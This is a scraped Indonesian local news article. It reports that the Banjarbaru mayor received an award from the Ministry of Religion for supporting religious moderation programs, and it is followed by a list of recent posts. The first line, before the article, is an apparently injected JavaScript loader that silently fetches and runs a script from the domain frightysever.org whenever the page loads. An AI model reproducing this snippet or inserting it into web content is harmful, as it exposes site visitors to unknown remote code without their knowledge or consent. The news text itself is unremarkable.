(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Categories: Kota Banjarbaru

Wali Kota Aditya Terima Penghargaan dari Menteri Agama, Bukti Ciptakan Banjarbaru Yang Agamis!


KANALKALIMANTAN.COM, BANJARBARU – Pemerintah Kota (Pemko) Banjarbaru di era kepemimpinan Wali Kota, Aditya Mufti Ariffin, kembali menyabet perhargaan dari pemerintah pusat. Kali ini penghargaan bentuk apreasiasi tersebut dihantarkan oleh Kementrian Agama (Kemenag) Republik Indonesia.

Momen istimewa itu berlangsung saat kegiatan audiensi dengan Kemenag Kota Banjarbaru yang dilaksanakan di ruang tamu Balai Kota, Jumat (10/12/2021).

Penghargaan simbolis berbentuk plakat sertifikat apresiasi diserahkan Kepala Kemenag Kota Banjarbaru, Abdul Basit, kepada Aditya.

Dalam hal ini, Wali Kota Banjarbaru didapuk sebagai Kepala Daerah yang telah berpartisipasi mendukung program moderasi beragama dan penguatan fungsi penyuluh agama. Penghargaan ini sendiri dikirimkan dan secara langsung ditandatangani oleh Menteri Agama Republik Indonesia Yaqut Cholil Qoumas.

 

 

Baca juga : Kapolda Kalsel dan Kapolres Kotabaru Raih Penghargaan MURI

“Alhamdulillah, hari ini saya mendapat penghargaan dari Menteri Agama. Penghargaan ini bentuk apresiasi karena telah mendukung dan menyukseskan program Kemenag di wilayah kota Banjarbaru,” kata Aditya.

Lewat penghargaan tersebut, tentu menjadi salah satu bukti kesuksesan sang Wali Kota dalam membawa visi misi menuju Banjarbaru “JUARA”, yang merupakan akronim dari Jujur, Agamis, dan Sejahtera.

Aditya mengungkapkan bahwa selama ini Pemko Banjarbaru dalam program-programnya selalu menekankan nilai-nilai agama dan terus menjaga keberagamaan yang ada. Komitmen ini diyakininya mampu menciptakan keseimbangan di lingkungan setiap masyarakat.

“Salah satu visi misi saya adalah menciptakan Kota Banjarbaru yang agamis. Nilai-nilai agama di kota ini harus ditunjukan. Tidak ada yang radikal. Harus menghargai perbedaan, dengan prinsip toleransi dan saling menghormati,” tuntasnya. (kanalkalimantan.com/al)

Reporter : al


Aldi Riduan

Uploader Terpercaya Kanal Kalimantan

Recent Posts

Aeris Hotel Kadung Operasi, Wali Kota Banjarbaru Tak Akan Halangi Investasi

Catatan Dinas Terkait: Daya Tampung Parkir, Laik Sehat, Persetujuan Lingkungan, dan Limbah B3 Read More

13 menit ago

Ancar-ancar Poros Acil Odah-Rozanie di Pilgub Kalsel, Pesaing Muhidin-Hasnur

Rozanie Klaim Dapat Restu Surya Paloh saat Paman Birin ke Nasdem Tower Read More

39 menit ago

Muatan 10 Ton Lebih Terjaring Razia Angkutan ODOL di Trikora

KANALKALIMANTAN.COM, BANJARBARU - Puluhan kendaraan pengangkut barang Over Dimension Over Load (ODOL) terjaring razia oleh… Read More

2 jam ago

Tera Ulang di Pasar Martapura Disambut Antusias Pedagang

KANALKALIMANTAN.COM, MARTAPURA - Tera Ulang Pasar UTTP Tradisional kembali digelar oleh Dinas Koperasi Usaha Mikro… Read More

2 jam ago

Galakkan Keberadaan Perpustakaan, Dispersip Banjar Gelar Sosialisasi

KANALKALIMANTAN.COM, MARTAPURA - Melalui Dinas Perpustakaan dan Kearsipan (Dispersip) Pemerintah Kabupaten Banjar menggelar Sosialisasi Perpustakaan… Read More

3 jam ago

Ajukan Usulan Proklim Lestari, Kelurahan Sekumpul Didatangi Tim dari KLHK

KANALKALIMANTAN.COM, MARTAPURA - Kantor Kelurahan Sekumpul, Kecamatan Martapura, Kabupaten Banjar, Rabu (29/5/2024) pagi kedatangan tim… Read More

3 jam ago

This website uses cookies.